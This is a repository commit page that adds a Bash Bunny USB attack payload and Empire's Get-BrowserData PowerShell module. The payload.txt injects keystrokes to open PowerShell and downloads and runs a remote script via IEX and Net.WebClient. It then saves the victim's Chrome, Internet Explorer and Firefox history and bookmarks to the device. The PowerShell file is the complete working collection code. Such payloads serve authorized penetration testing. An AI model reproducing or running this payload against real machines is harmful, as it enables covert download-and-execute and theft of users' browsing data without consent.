hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added Browser Data payload 

* browserData

* Fix error
pull/71/merge
zachstanford 2017-04-07 17:16:18 +10:00 committed by Darren Kitchen
parent fe70f7e5b4
commit 217dee5249
2 changed files with 276 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
payloads/library/browserData/payload.txt Executable file
View File

@ -0,0 +1,37 @@
exit
#!/bin/bash
#
# Title: BrowserData
# Author: zachstanford
# Version: 0.1 (Tested on Windows 10)
#
# Dumps browser info like history and bookmarks from powershell script
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
# Credits to this Empire's powershell script:
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
#script
# Blue...............Running Script
# Purple.............Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LOOTDIR=/root/udisk/loot/BrowserData
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING powershell "$bunny =(gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter); IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-BrowserData.ps1"); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt;"
Q ENTER
Q DELAY 2000
Q STRING exit
Q ENTER
sync
LED R B 200

239
payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1 Executable file
View File

@ -0,0 +1,239 @@
function Get-BrowserInformation {
<#
.SYNOPSIS
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
and/or Firefox browsers on Windows machines.
.PARAMETER Browser
The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
.PARAMETER Datatype
Type of data to enumerate, 'History' or 'Bookmarks'
.PARAMETER UserName
Specific username to search browser information for.
.PARAMETER Search
Term to search for
.EXAMPLE
PS C:\> Get-BrowserInformation
Enumerates browser information for all supported browsers for all current users.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
Enumerates bookmarks for Internet Explorer for the user 'user1'.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
results matching the search term 'github'.
#>
[CmdletBinding()]
Param
(
[Parameter(Position = 0)]
[String[]]
[ValidateSet('Chrome','IE','FireFox', 'All')]
$Browser = 'All',
[Parameter(Position = 1)]
[String[]]
[ValidateSet('History','Bookmarks','All')]
$DataType = 'All',
[Parameter(Position = 2)]
[String]
$UserName = '',
[Parameter(Position = 3)]
[String]
$Search = ''
)
function ConvertFrom-Json20([object] $item){
#http://stackoverflow.com/a/29689642
Add-Type -AssemblyName System.Web.Extensions
$ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
return ,$ps_js.DeserializeObject($item)
}
function Get-ChromeHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find Chrome History for username: $UserName"
}
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Chrome'
DataType = 'History'
Data = $_
}
}
}
}
function Get-ChromeBookmarks {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
} else {
$Json = Get-Content $Path
$Output = ConvertFrom-Json20($Json)
$Jsonobject = $Output.roots.bookmark_bar.children
$Jsonobject.url |Sort -Unique | ForEach-Object {
if ($_ -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'Bookmark'
Data = $_
}
}
}
}
}
function Get-InternetExplorerHistory {
#https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
$Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
$Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach($Path in $Paths) {
$User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
$Path = $Path | Select-Object -ExpandProperty PSPath
$UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
if (-not (Test-Path -Path $UserPath)) {
Write-Verbose "[!] Could not find IE History for SID: $Path"
}
else {
Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
$Key = $_
$Key.GetValueNames() | ForEach-Object {
$Value = $Key.GetValue($_)
if ($Value -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'IE'
DataType = 'History'
Data = $Value
}
}
}
}
}
}
}
function Get-InternetExplorerBookmarks {
$URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
ForEach ($URL in $URLs) {
if ($URL.FullName -match 'Favorites') {
$User = $URL.FullName.split('\')[2]
Get-Content -Path $URL.FullName | ForEach-Object {
try {
if ($_.StartsWith('URL')) {
# parse the .url body to extract the actual bookmark location
$URL = $_.Substring($_.IndexOf('=') + 1)
if($URL -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $User
Browser = 'IE'
DataType = 'Bookmark'
Data = $URL
}
}
}
}
catch {
Write-Verbose "Error parsing url: $_"
}
}
}
}
}
function Get-FireFoxHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox History for username: $UserName"
}
else {
$Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
$Value.Value |ForEach-Object {
if ($_ -match $Search) {
ForEach-Object {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'History'
Data = $_
}
}
}
}
}
}
if (!$UserName) {
$UserName = "$ENV:USERNAME"
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-ChromeHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-ChromeBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-InternetExplorerHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-InternetExplorerBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-FireFoxHistory
}
}
}